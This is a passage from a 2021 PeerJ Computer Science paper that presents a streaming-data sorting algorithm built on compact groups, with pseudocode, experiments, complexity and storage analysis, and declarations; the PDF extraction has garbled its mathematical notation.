illustrated in subfigures (A), (B), (C), (D) and (E). Full-size DOI: 10.7717/peerj-cs.355/fig-2 Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 9/27 http://dx.doi.org/10.7717/peerj-cs.355/fig-2 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ Definition 9 Type-3 status condition s(3) of a datum wk + i and its neighbors in a type-3 subsequence wk,…,wk + i,…,wk + m, where m<h is a constant defined by: sð3Þ ¼ 1 ðwkþi�1 � wk þ 2Þ mod 3 ¼ wkþi � wkþi�1 for 0 � i � m 0 otherwise: � Definition 10 Type-4 status condition s(4) of a datum wk + i and its neighbors in a type-4 subsequence wk,…,wk + i,…,wk + m, where m < h is a constant defined by: sð4Þ ¼ 1 wkþi � wkþi�1 ¼ 2 for 0 � i � m 0 otherwise: � The notations in this paper are given in Table 2. Q(t)||S|| C denotes orderly concatenating Q(t), S, C according to the sorted order of all elements in W(t). The quantity of removed data of type-1 is greater than those of the other types. The difference of the first and the last data of a type-4 compact group is larger than the differences in the other types. To greatly reduce and control the storage size, the sequences of types 1 and 4 are detected before the sequences of types 2 and 3. Suppose the following sequence (1, 3, 4, 5, 6) is given. If types 1 and 4 are considered before types 2 and 3, then the given sequence is compacted as 1, (3, 6)(1), which requires 4 units of storage to store numbers 1, 3, 6, 1. However, if types 2 and 3 are considered before types 1 and 4, then the given sequence is compacted as (1, 4)(2), 5, 6, which requires 5 units of storage to store numbers 1, 4, 2, 5, 6. Theorem 1 If p ¼ arg max 1�i�4 ðciÞ, then p denotes the correct type of the compact group. Proof: Suppose the sorted sequence is W(t) = (w1, w2, …, wh). We consider each type of compact group. Let s(i)t be the status condition of type-i at time t and T (i) = (s(i)1 , s (i) 2 , …, s (i) h ) be the sequence of s(i)t . There are four cases to be investigated. Table 2 Notations in streaming data sort. Notations Short definitions Examples di The i th incoming datum −3, 0, 10 (d1,d2,d3,…) Sequence of streaming data (−3, 0, 10,…) h Window size at iteration t 5, 0, 4, 1 wi The i th member in a window 18, 1, 10 W(t) Unsorted window at iteration t (18, 1, 10, 6,…) W(t) Sorted window at iteration t (1, 6, 10, 18,…) p Type of sub-sequence 1, 2, 3, 4 Tp Type-p sub-sequence (2, 4, 6, 8, 10, 12) (u, v)(p) Type-p compact group (2, 12)(3) ri The i th retrieved number 2, 4, 6, 8, 10, 12 R((u, v)(p)) Retrieved sequence of (u, v)(p) (2, 4, 6, 8, 10, 12) s(i) Status condition of type-i 0, 1 qi The i th compact group (1, 5)(4), (9, 12)(1) S Set of single numbers {6, 7} C Set of compact groups {(1, 5)(4), (9, 12)(1)} Q(t) Combining set of C and S at iteration t {(1, 5)(4), 6, 7, (9, 12)(1)} Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 10/27 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ Case 1 (type-1): Suppose the sorted sequence W(t) = (w1, w2, …, wh) is in type-1. Then, we have the following four sequences of the status condition. Tð1Þ ¼ sð1Þ1 ¼ 0; sð1Þ2 ¼ 0; sð1Þ3 ¼ 1; . . . ; sð1Þh ¼ 1 � � or ð0; 0; 1; . . . ; 1Þ Tð2Þ ¼ sð2Þ1 ¼ 0; sð2Þ2 ¼ 0; sð2Þ3 ¼ 0; . . . ; sð2Þh ¼ 0 � � or ð0; 0; 0; . . . ; 0Þ Tð3Þ ¼ sð3Þ1 ¼ 0; sð3Þ2 ¼ 0; sð3Þ3 ¼ 0; . . . ; sð3Þh ¼ 0 � � or ð0; 0; 0; . . . ; 0Þ Tð4Þ ¼ sð4Þ1 ¼ 0; sð4Þ2 ¼ 0; sð4Þ3 ¼ 0; . . . ; sð4Þh ¼ 0 � � or ð0; 0; 0; . . . ; 0Þ Obviously, the value of c1 ¼ Ph t¼1 s ð1Þ t is larger than that of c2, c3, and c4. Case 2 (type-2): Suppose the sorted sequence W(t) = (w1, w2, …, wh) is in type-2. Then, we have the following four sequences of the status condition. Tð1Þ ¼ sð1Þ1 ¼ 0; sð1Þ2 ¼ 0; sð1Þ3 ¼ 0; . . . ; sð1Þh ¼ 0 � � or ð0; 0; 0; . . . ; 0Þ Tð2Þ ¼ sð2Þ1 ¼ 0; sð2Þ2 ¼ 0; sð2Þ3 ¼ 1; . . . ; sð2Þh ¼ 1 � � or ð0; 0; 1; . . . ; 1Þ Tð3Þ ¼ sð3Þ1 ¼ 0; sð3Þ2 ¼ 0; sð3Þ3 ¼ 0; . . . ; sð3Þh ¼ 0 � � or ð0; 0; 0; . . . ; 0Þ Tð4Þ ¼ sð4Þ1 ¼ 0; sð4Þ2 ¼ 0; sð4Þ3 ¼ 0; . . . ; sð4Þh ¼ 0 � � or ð0; 0; 0; . . . ; 0Þ Obviously, the value of c2 ¼ Ph t¼1 s ð2Þ t is larger than that of c1, c3, and c4. Case 3 (type-3): Suppose the sorted sequence W(t) = (w1, w2, …, wh) is in type-3. Then, we have the following four sequences of the status condition. Tð1Þ ¼ sð1Þ1 ¼ 0; sð1Þ2 ¼ 0; sð1Þ3 ¼ 0; . . . ; sð1Þh ¼ 0 � � or ð0; 0; 0; . . . ; 0Þ Tð2Þ ¼ sð2Þ1 ¼ 0; sð2Þ2 ¼ 0; sð2Þ3 ¼ 0; . . . ; sð2Þh ¼ 0 � � or ð0; 0; 0; . . . ; 0Þ Tð3Þ ¼ sð3Þ1 ¼ 0; sð3Þ2 ¼ 0; sð3Þ3 ¼ 1; . . . ; sð3Þh ¼ 1 � � or ð0; 0; 1; . . . ; 1Þ Tð4Þ ¼ sð4Þ1 ¼ 0; sð4Þ2 ¼ 0; sð4Þ3 ¼ 0; . . . ; sð4Þh ¼ 0 � � or ð0; 0; 0; . . . ; 0Þ Obviously, the value of c3 ¼ Ph t¼1 s ð3Þ t is larger than that of c1, c2, and c4. Case 4 (type-4): Suppose the sorted sequence W(t) = (w1, w2, …, wh) is in type-4. Then, we have the following four sequences of the status condition. Tð1Þ ¼ sð1Þ1 ¼ 0; sð1Þ2 ¼ 0; sð1Þ3 ¼ 0; . . . ; sð1Þh ¼ 0 � � or ð0; 0; 0; . . . ; 0Þ Tð2Þ ¼ sð2Þ1 ¼ 0; sð2Þ2 ¼ 0; sð2Þ3 ¼ 0; . . . ; sð2Þh ¼ 0 � � or ð0; 0; 0; . . . ; 0Þ Tð3Þ ¼ sð3Þ1 ¼ 0; sð3Þ2 ¼ 2; sð3Þ3 ¼ 0; . . . ; sð3Þh ¼ 0 � � or ð0; 0; 0; . . . ; 0Þ Tð4Þ ¼ sð4Þ1 ¼ 0; sð4Þ2 ¼ 0; sð4Þ3 ¼ 1; . . . ; sð4Þh ¼ 1 � � or ð0; 0; 1; . . . ; 1Þ Obviously, the value of c4 ¼ Ph t¼1 s ð4Þ t is larger than that of c1, c2, and c3.▪ Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 11/27 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ Inserting numbers into the combination set of compact groups After creating the first combination set of compact group Q(1) and obtaining a new incoming sequence, the current compact groups must be updated according to the number in the incoming sequence. There are seven possible cases where a new incoming number can be inserted into any compact group or in between a compact group and a single number. Let the a new incoming number da is located according to each case as follows. Q(t) is the set of combinations of compact groups and a set of single numbers at time t. Case 1: da is at the front of Q (t). Case 2: da is at the rear of Q (t). Case 3: da is in a compact group (uj, vj) (p). Case 4: da is in between two compact groups (uj, vj) (pj) and (uk, vk) (pk). Case 5: da is in between a single number wj and a compact group (uk, vk) (pk). Case 6: da is in between a compact group (uj, vj) (pj) and a single number wk. Case 7: da is in between two single numbers wj and wj + 1. The details of each case and the insertion steps are in given in Algorithm 2. EXPERIMENTAL RESULTS AND DISCUSSION Three issues are discussed in this section. The first issue illustrates the snapshot of sorting outcomes as the results of incoming data chunks, current compact groups of different types, and sets of single numbers. The second issue discusses the relation between the sorting time and the number of streaming numbers. The third issue shows how the size of working storage changes during the sorting process. Sorting examples The proposed algorithms are implemented in MATLAB R2016a. The computing results are run on 3.4 GHz Intel Core i7 6700 and 16 GB of 2400 MHz RAM with the Windows 10 platform. To illustrate how the proposed algorithm works, three experiments were conducted by using a set of 100 single integers ranging from 1 to 100. These 100 numbers were randomly permuted to produce three different experimental data sets. The total size of storage is assumed to have only 60 working addresses. Forty of them are used for storing temporary data generated during the sorting process, which includes WðtÞ, W(t), and Q(t) at different times. The rest of storage is for storing some variables in the sorting program. To illustrate the continuous results during the sorting process, three data sets in the experiment were generated from three permutations of integer numbers from 1 to 100 to avoid any duplication. These permuted numbers are sliced into a set of input chunks of at most 40 numbers in each chunk. Let mtotj j be the total size of the working storage, which is equal to 60 in the experiment. The experimental results are shown in Fig. 3, where the x-axis represents each wi in W (t) and Q(t) and the y-axis represents the time line of iterations. Each datum wi is represented by ×. Each type of compact group in Q (t) is denoted by a solid line with a specific color as follows. Type-1 is denoted by gray line. Type-2 is denoted by blue line. Type-3 is denoted by green line. Type-4 is denoted by red line. Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 12/27 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ A single number in the compact window is represented by •. In the first data set, there are 40 numbers entering the process at the starting time. After being grouped by Algorithm 1, the result appears in time step t = 1 (at the line above the bottom line in Fig. 3A. There are four compact groups of type-1, two compact groups of type-2, three compact groups of type-4, and nine single numbers. Also, at time t = 1, there are four new incoming numbers, each of which is represented by ×. Algorithm 1 sorts Algorithm 1 Creating compact groups. Input: a sorted sequence W(t) = (wk, wk+1, …, wk+h) of length h at time t. Output: a combination of a set of compact groups and a set of single numbers. 1. j = k. 2. S = Ø. /* set of single numbers */ 3. C = Ø. /* set of compact groups */ 4. Q(t) = Ø. 5. For l = 1 to 2 do /* packing order types 1, 4 before 2, 3 */ 6. c1 = c2 = c3 = c4 = 0. 7. If |wk −wk+1| > 2 then 8. S = S∪{wk}. 9. j = k+1. 10. EndIf 11. For i = k+1 to k+h−1 do 12. If |wi−wi+1| ≤ 2 then 13. Set the values of s(1), s(2), s(3), s(4) by definitions 7–10. 14. cl = cl +s (l). 15. c5−l = c5−l +s (5−l). 16. else 17. If j = i then 18. S = S∪{wj}. /* single number */ 19. j = i +1. 20. else 21. p = arg maxi2fl;5−lg (ci). /* compact types */ 22. Create a compact group (wj, wi) (p). 23. C = C∪{(wj, wi) (p)}. 24. c1 = c2 = c3 = c4 = 0. 25. j = i + 1. 26. EndIf 27. EndIf 28. Q(t) = Q(t)||S||C. 29. EndFor 30. EndFor Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 13/27 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ Algorithm 2 Inserting dα into Q(t). Input: (1) set Q(t). (2) a new number da. Output: a new Q(t+1). 1. Identify the case of insertion for da. 2. Case: 3. 1: If the first element of Q(t) is (u1, v1) (p1) then 4. Let U be the retrieved (u1, v1) (p1) by using Eqs. (2), (3) and (4). 5. else 6. Put d1 in U. 7. EndIf 8. Use Algorithm 1 with da and U to generate a new set of elements. 9. EndCase 10. 2: If the last element of Q(t) is (um, vm) (pm) then 11. Let U be the retrieved (um, vm) (pm) by using Eqs. (2), (3) and (4). 12. else 13. Put dm in U. 14. EndIf 15. Use Algorithm 1 with da and U to generate a new set of elements. 16. EndCase 17. 3: Let U be the retrieved (um, vm) (pm) by using Eqs. (2), (3) and (4). 18. Use Algorithm 1 with da and U to generate a new set of elements. 19. EndCase 20. 4: Let U be the retrieved (uj, vj) (pj) by using Eqs. (2), (3) and (4). 21. Let V be the retrieved (uk, vk) (pk) by using Eqs. (2), (3) and (4). 22. Use Algorithm 1 with da, U and V to generate a new set of elements. 23. EndCase 24. 5: Let U be the retrieved (uk, vk) (pk) by using Eqs. (2), (3) and (4). 25. Use Algorithm 1 with da, wj and U to generate a new set of elements. 26. EndCase 27. 6: Let U be the retrieved (uj, vj) (pj) by using Eqs. (2), (3) and (4). 28. Use Algorithm 1 with da, U and wk to generate a new set of elements. 29. EndCase 30. 7: Use Algorithm 1 with da, wj and wk to generate a new set of elements. 31. EndCase 32. Repeat 33. Use Algorithm 1 with the new set of elements and the unpacked element next to the new set next to the new set of elements to generate the next new set of elements in Q(t). 34. Until no more new elements. 35. Rename Q(t) as Q(t+1). 36. EndCase Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 14/27 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ all incoming 100 numbers appearing in various chunks within only 19 time steps, whereas it takes 21 and 18 time steps for the second and the last data sets, respectively. Execution time vs working storage size In this experiment, the relation between the total numbers to be sorted and the sorting time was investigated. The total storage, mtot, is partitioned into two portions. The first portion, mprog, is for the sorting program. The size of mprog is fixed throughout the sorting process. The second portion, mwork, is the working storage for storing all compact groups, sets of single numbers, and other relevant variables occurring during in the sorting algorithm. Since the sorting time directly depends upon the size of mwork, the size of mwork is thus set as a function of the total numbers to be sorted. Let n ≫|mwork| be the total Figure 3 Snapshots of sorting results from three different permuted data sets, each of which contains 100 numbers. (A) The time steps of the sorting result of data set 1. (B) The time steps of the sorting result of data set 2. (C) The time steps of the sorting result of data set 3. Full-size DOI: 10.7717/peerj-cs.355/fig-3 Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 15/27 http://dx.doi.org/10.7717/peerj-cs.355/fig-3 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ numbers to be sorted. All numbers to be sorted flow gradually and continuously into the working storage one chunk at an initial time. To investigate the execution time of the sorting process with respect to the quantity of numbers and |mwork|, the size of mwork is set in terms of n as follows. jmworkj ¼ g � n (5) where γ ∈ {0.50, 0.45, 0.40, 0.35} and n ∈ {103, 104, 105, 106}. Table 3 summarizes the proposed sorting algorithm time of different quantities of incoming numbers with respect to the different sizes of the working memory. The incoming numbers were randomly generated and permuted. No duplicated numbers appear in the data sets. To visualize the trend of the sorting time vs the size of data sets, Fig. 4 shows the log-scaled trend of each data set. There are four lines in blue, red, yellow, and purple representing different sizes of mwork. Note that the sorting time of each data set linearly Figure 4 Log-scaled sorting execution time in seconds for different sizes of working storage n = 103, 104, 105 and 106. Full-size DOI: 10.7717/peerj-cs.355/fig-4 Table 3 Sorting execution time of the proposed algorithm with respect to size of working storage. n Execution time (s) γ = 50% γ = 45% γ = 40% γ = 35% 103 0.87 0.98 1.16 1.30 104 7.15 8.08 9.33 11.02 105 71.06 79.17 92.80 109.88 106 709.49 791.17 933.80 1,065.71 Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 16/27 http://dx.doi.org/10.7717/peerj-cs.355/fig-4 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ increases. Then, the experiment has a linear polynomial time complexity of O(n). Table 4 summarizes the time of external sorting of different quantities of incoming numbers with respect to the different sizes of buffer. The execution time of proposed sorting algorithm is approximately 8.72 times faster than the execution time of external sorting at a million data when storage size is limited to 50%. Furthermore, the proposed algorithm run on 4 GB of numeric data takes about 4.21 days. Fluctuation of compact groups and single number sets Since the proposed sorting algorithm is designed to cope with a streaming data environment where the set of numbers to be sorted can overflow the working storage and the chunks of numbers gradually flow into the working storage, there are three interesting behavioral periods concerning the number of compact groups and sets of single numbers created during the sorting process. It is remarkable that the number of compact groups and sets of single numbers increase during the beginning period due to random values of incoming numbers. The length of beginning period depends upon the random sequence of numbers, which is unpredictable. After the beginning period, some new incoming numbers may fall into the existing compact groups and some of them may form new compact groups with some sets of single numbers. Some existing compact groups can be merged with new compact groups created from some sets of single numbers into new compact groups. These conditions make the number of compact groups almost stable for some period of time. In the last period, those new incoming numbers obviously fall to combine with the existing compact groups. Some sequences of compact groups are possibly merged into new compact groups with more elements in the groups. Thus, the number of compact groups decreases until there is one compact group that contains all sorted numbers. Figure 5 illustrates the fluctuation of compact groups with sets of single numbers vs the time steps for different sizes of working storage. During the sorting process, the number of compact groups and sets of single numbers increases and decreases. The fluctuation of used and unused areas of working storage of the results in Fig. 5 is summarized in Fig. 6. Notice that the proposed algorithm can reduce the working space to 65% of the data size. In the other words, the working space of the proposed algorithm is 35% of the data size. Comparison of storage size used and correctness of sorted order Regardless of the sorting types, either exact sort or approximate sort, the order of each number in the sorted list must be correct according to the value of each number for Table 4 Sorting execution time of external sorting with respect to buffer size. n Execution time (s) Buffer = 50% Buffer = 45% Buffer = 40% Buffer = 35% 103 2.30 2.69 2.64 2.66 104 26.95 21.04 20.19 20.18 105 209.41 207.27 206.87 205.15 106 6,187.14 5,312.09 4,754.30 4,539.04 Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 17/27 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ Figure 6 Snapshot of fluctuation of unused area of working storage at a million data during the sorting period for different sizes of working storage. Full-size DOI: 10.7717/peerj-cs.355/fig-6 Figure 5 Snapshot of fluctuation of compact groups and sets of single numbers at a million data during the sorting period for different sizes of working storage. Full-size DOI: 10.7717/peerj-cs.355/fig-5 Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 18/27 http://dx.doi.org/10.7717/peerj-cs.355/fig-6 http://dx.doi.org/10.7717/peerj-cs.355/fig-5 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ both ascending and descending sorts. If it is not so, the sorted list is useless in any applications. To verify the efficiency and the accurate order of sorted numbers as the result of proposed streaming data sort in a streaming data environment with limited storage size, the result was compared with the result of approximate sorting algorithm (Farnoud, Yaakobi & Bruck, 2016) capable of handling streaming data, and external sorting. The following set of numbers was experimented: {18, 1, 10, 6, 2, 12, 9, 3, 16, 19, 14, 11, 17, 13, 20, 8, 4, 15, 5, 7}. In order to simulate streaming data, the set of numbers was decomposed into several consecutive chunks. The first incoming chunk contains nine numbers. The other following chunks contain only one number. Two issues concerning the change of storage size during the sorting process and the wrong sorted order were recorded in the experiment. Since streaming data sort algorithm uses only one working storage of fixed size throughout the sorting process, there is no change of storage size for this algorithm. But in case of approximate sorting and external sorting algorithms, both of them require working storage of fixed size and also external storage of variable size. Hence, the change of storage size only occurs in the external storage. Figure 7 snapshots the storage size change at each time. mwork is a constant denoting the fixed size of working storage. The size of external storage is expandable according to the amount of temporary data generated during the sorting algorithms. It is remarkable that the proposed streaming data sort does not require any space in the external storage. Only working storage space alone is enough to complete the sorting Figure 7 Comparison of storage size change as the results of sorting a set of streaming data by the proposed streaming data sort algorithm, approximate sorting (Farnoud, Yaakobi & Bruck, 2016) algorithm and external sorting. Full-size DOI: 10.7717/peerj-cs.355/fig-7 Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 19/27 http://dx.doi.org/10.7717/peerj-cs.355/fig-7 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ process. But both approximate sorting and external sorting need some additional spaces in the external storage. These spaces keep increasing when there are more incoming numbers to be sorted. The sorted order of all numbers obtained from streaming data sort is perfectly correct. But the sorted orders of numbers 7, 8, 13, 14 obtained from approximate sorting are not correct. Although the sorted order obtained from external sorting is perfectly correct, this algorithm requires a large size of external storage which is impractical for streaming data environment. Time complexity analysis There are two main phases in the sorting process. The first phase is to sort the first incoming chunk of numbers to obtain the first set of compact groups as well as sets of single numbers. The second phase is to sort the consequent chunks with the existing compact groups and single numbers. Let h ≤ |mwork| be the size of each input chunk. The time complexity of each phase is as follows. Phase 1: The operation of this phase is in Algorithm 1. Obtaining h numbers takes O(h). These h numbers must be sorted to create compact groups and sets of single numbers. The time to sort h numbers is O(h log (h)). After sorting, the time to create compact groups and sets of single numbers takes O(h). Thus, the time of this phase is O(h) + O(h log(h)) + O(h) = O(h log(h)). Phase 2: From Algorithm 1, all compact groups at any time are in set C, and all single numbers are in set S. The time complexity of this phase can be analyzed from Algorithm 2. There are seven cases to be identified for inserting a new number da at step 1. The identifying time takes O(|C|) + O(|S|) ¼ maxðOðjCjÞ; OðjSjÞÞ. Then, applying Eqs. (2), (3) and (4) to retrieve the numbers from a compact group takes O(1). After retrieval of the numbers, Algorithm 1 is applied to create a new compact group and a set of single numbers with the new incoming da. This step takes at most O(h). At steps 32–34, Algorithm 1 is repeatedly applied to update sets C and S. This takes at most O(h×|C|) + O(|S|). Since |C| ≤ h and |S| ≤ h, the time complexity of steps 32–34 is O(h2). Thus, phase 2 takes max(O(|C|), O(|S|)) + O(1) + O(h) + O(h2) = O(h2) for each da. If there are in total n numbers to be sorted, then the time complexity is O(h log(h)) + O((n − h) × h2) = O(nh2). However, h is a constant. Hence, the time complexity of the sorting process is O(n). Storage usage analysis The behavior of storage usage is in the form of a capsized bell shape, as shown in Fig. 5. The descriptive rationale behind this behavior was briefly provided in Fluctuation of Compact Groups and Single Number Sets Section. This section will theoretically analyze this behavior based on the probability of all seven cases for a compact group. Suppose there are n total streaming numbers to be sorted. All incoming n numbers are assumed to be randomly permuted and partitioned into nh input chunks of size h each. Let ni be the numbers in the ith input data chunk. After obtaining the first input data chunk, the probability of each case for the next new incoming number da for any compact group qi is as follows. Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 20/27 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ Case 1: da is at the front of qi. The probability of case 1 is calculated by the probability of picking da from n − n1 and the probability of having da in the next input chunk. The probability of picking da from n − n1 numbers is 1 n�n1. However, if da is the next new incoming number, then da must be in the next input data chunk. The probability that da is in the next input chunk is 1n h�1 . Thus, the probability of case 1 is as follows. p1 ¼ 1 n � n1 � 1n h � 1 (6) Case 2: da is at the rear of qi. The probability of case 2 can be analyzed as that of case 1. Case 3: da is in a compact group qi, types 2, 3, and 4 are compact groups only. If qi is a type-2 compact group, then the probability that da is in qi is �jqij 2 � � 1n�n1, where |qi| represents the numbers compacted in qi. If qi is a type-3 compact group, then the probability that da is in qi is �jqij 2 � � 1n�n1. If qi is a type-4 compact group, then the probability that da is in qi is jqij�1ð Þ n�n1 . p3 ¼ �jqij 2 � � 1 n � n1 � 1n h � 1 types 2 or 3 jqij � 1 n � n1 � 1n h � 1 type 4: 8>>< >>: (7) Case 4: da is in between two compact groups qi and qi + 1. The probability of case 4 can be analyzed as that of case 1. Case 5: da is in between a single number wj and a compact group qi. If qi is a type-1 compact group, then the probability that da is in qi is 1 n�n1. If qi is a type-2 compact group, then the probability that da is in qi is 1 n�n1. If qi is a type-3 compact group, then the probability that da is in qi is 1 n�n1. If qi is a type-4 compact group, then the probability that da is in qi is 1 n�n1. The probability of case 5 can be analyzed as that of case 1. Case 6: da is in between a compact group qi and a single number wk. The probability of case 6 can be analyzed as that of case 1. Case 7: da is in between two single numbers wj and wj + 1. The probability of case 7 can be analyzed as that of case 1. Note that the probability of all cases for the first input data chunk is written as follows. p ¼ jqij 2 � � � 1 n � n1 � 1n h � 1 case 3 ðtype 2 or type 3Þ jqij � 1 n � n1 � 1n h � 1 case 3 ðtype 4Þ 1 n � n1 � 1n h � 1 other cases 8>>>>>>< >>>>>>: (8) After the first input data chunk, the probability of each case after m next input data chunks can be written in a generic form as follows. Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 21/27 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ p ¼ jqij 2 � � � 1 n � Pmi¼1 ni � 1 n h � m case 3 ðtype 2 or type 3Þ jqij � 1 n � Pmi¼1 ni � 1 n h � m case 3 ðtype 4Þ 1 n � Pmi¼1 ni � 1 n h � m other cases 8>>>>>>< >>>>>>: (9) Note that the value n � Pmi¼1 ni and nh � m will finally approach 1. This implies that the number of compact groups decreases and eventually there should be only one compact group. However, the time during which the probability approaches 1 depends upon the value of h, as shown in Fig. 8. If h is large, then the chance that an input chunk contains a tentative sorted sequence is also high. Theorem 2 The only possible existing case to be tested for the last incoming data chunk is case 1, case 2, case 4, case 5, case 6, or case 7. Proof: The only probability approaching 1 is the probability of case 1, case 2, case 4, case 5, case 6, and case 7 as defined in Eqs. (9).▪ CONCLUSION This study proposed a concrete concept and practical algorithm to sort streaming numbers in the case where the total numbers overflow the actual storage. No secondary storage is involved in this constraint. The size of the working storage, h, for sorting is fixed Figure 8 Probability of cases 1, 2, 4, 5, 6 and 7 of 100 data where h = 4. Full-size DOI: 10.7717/peerj-cs.355/fig-8 Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 22/27 http://dx.doi.org/10.7717/peerj-cs.355/fig-8 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ throughout the sorting event. The incoming numbers are captured by new proposed data architectures in the forms of sets of single numbers and compact groups of sorted numbers. The actual order of each number with respect to the total numbers, n, in the streaming sequence can be correctly retrieved within O(h). The time complexity of the proposed algorithm is O(n), and the space complexity is O(M). From the experiments, it was found that the proposed algorithm can correctly and stably handle the streaming data size of at least 2.857 times larger than the size of the working storage. Furthermore, the sorted order obtained from the proposed algorithm is absolutely correct, no approximate order. In addition, each number can be directly retrieved from any compact group by its type. The analysis of dynamic change of used and unused working storage areas during the sorting process was also provided. Although the proposed algorithm is primarily designed for a single processor, the proposed algorithm can be practically extended to be implemented on a multiprocessor architecture with a slight modification. In the case of a multiprocessor architecture, more than one chunk of data can simultaneously flow into the machine by one chunk per processor. The proposed algorithm can be deployed by each processor to sort each incoming chunk and to merge the final sorted results from all processors later. In fact, there are several real applications requiring this kind of sorting process where the data always overflow the working memory. Some applications are the followings: 1. Managing tremendous information inside large organizations by sorting transactions according to account numbers, locations of customers, date stamp, price or popularity of stock, ZIP code or address of mail, and so on (Sedgewick & Wayne, 2011). The proposed algorithm can reduce memory storage for keeping those data. 2. Reducing the search time of huge streaming data by sorting the data first and representing them in compact groups as implemented in streaming data sort algorithm. 3. Computing order statistics, quartile, decile, and percentile of big streaming data continuously flowing into an internet-scale network monitoring system and database query optimization (Buragohain & Suri, 2009). 4. Checking duplicated data for fraud detection or fake social engagement activities such as bidding on an item, filling out a form, clicking an advertisement, or making a purchase (Metwally, Agrawal & El Abbadi, 2005; Li et al., 2016). Even though the proposed streaming data sort successfully sorts the streaming data under the defined constraints but some of the following further studies of streaming data sorting based on other constraints can be pursued. 1. Developing a new structure of compact group whose type can be adapted to any arbitrary different value of two temporal consecutive numbers. 2. Extending the sorting concept to cope with various data types such as a character string or a floating point number which exist in other engineering, scientific, and business problems. Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 23/27 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by Development and Promotion of Science and Technology Talents Project (DPST) and Thailand Research Fund under grant number RTA6080013. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Development and Promotion of Science and Technology Talents Project (DPST). Thailand Research Fund: RTA6080013. Competing Interests The authors declare that they have no competing interests. Author Contributions � Suluk Chaikhan conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Suphakant Phimoltares conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Chidchanok Lursinsap conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Data, including permutations of random integers, are available at the UCI repository (https://archive.ics.uci.edu/ml/datasets.php). Specifically: - Beijing PM2.5 Data Data Set: https://archive.ics.uci.edu/ml/datasets/Beijing+PM2.5+Data - Census Income Data Set: http://archive.ics.uci.edu/ml/datasets/Census+Income - Covertype Data Set: https://archive.ics.uci.edu/ml/datasets/covertype - Diabetes Data Set: https://archive.ics.uci.edu/ml//datasets/Diabetes - PM2.5 Data of Five Chinese Cities Data Set: https://archive.ics.uci.edu/ml/datasets/ PM2.5+Data+of+Five+Chinese+Cities - Incident management process enriched event log Data Set: https://archive.ics.uci.edu/ml/datasets/Incident+management+process+enriched+event+log - KEGG Metabolic Relation Network (Directed) Data Set: https://archive.ics.uci.edu/ml/ datasets/KEGG+Metabolic+Relation+Network+(Directed) Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 24/27 https://archive.ics.uci.edu/ml/datasets.php https://archive.ics.uci.edu/ml/datasets/Beijing+PM2.5+Data http://archive.ics.uci.edu/ml/datasets/Census+Income https://archive.ics.uci.edu/ml/datasets/covertype https://archive.ics.uci.edu/ml//datasets/Diabetes https://archive.ics.uci.edu/ml/datasets/PM2.5+Data+of+Five+Chinese+Cities https://archive.ics.uci.edu/ml/datasets/PM2.5+Data+of+Five+Chinese+Cities https://archive.ics.uci.edu/ml/datasets/Incident+management+process+enriched+event+log https://archive.ics.uci.edu/ml/datasets/KEGG+Metabolic+Relation+Network+(Directed) https://archive.ics.uci.edu/ml/datasets/KEGG+Metabolic+Relation+Network+(Directed) http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ - KEGG Metabolic Reaction Network (Undirected) Data Set: https://archive.ics.uci.edu/ ml/datasets/KEGG+Metabolic+Reaction+Network+(Undirected) - Buzz in social media Data Set: https://archive.ics.uci.edu/ml/datasets/Buzz+in+social +media+. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.355#supplemental-information. REFERENCES Agrawal A, Sriram B. 2015. Concom sorting algorithm. In: 015 4th International Conference on Computer Science and Network Technology. Vol. 1. 229–233. Al-Fuqaha A, Guizani M, Mohammadi M, Aledhari M, Ayyash M. 2015. Internet of things: a survey on enabling technologies, protocols, and applications. IEEE 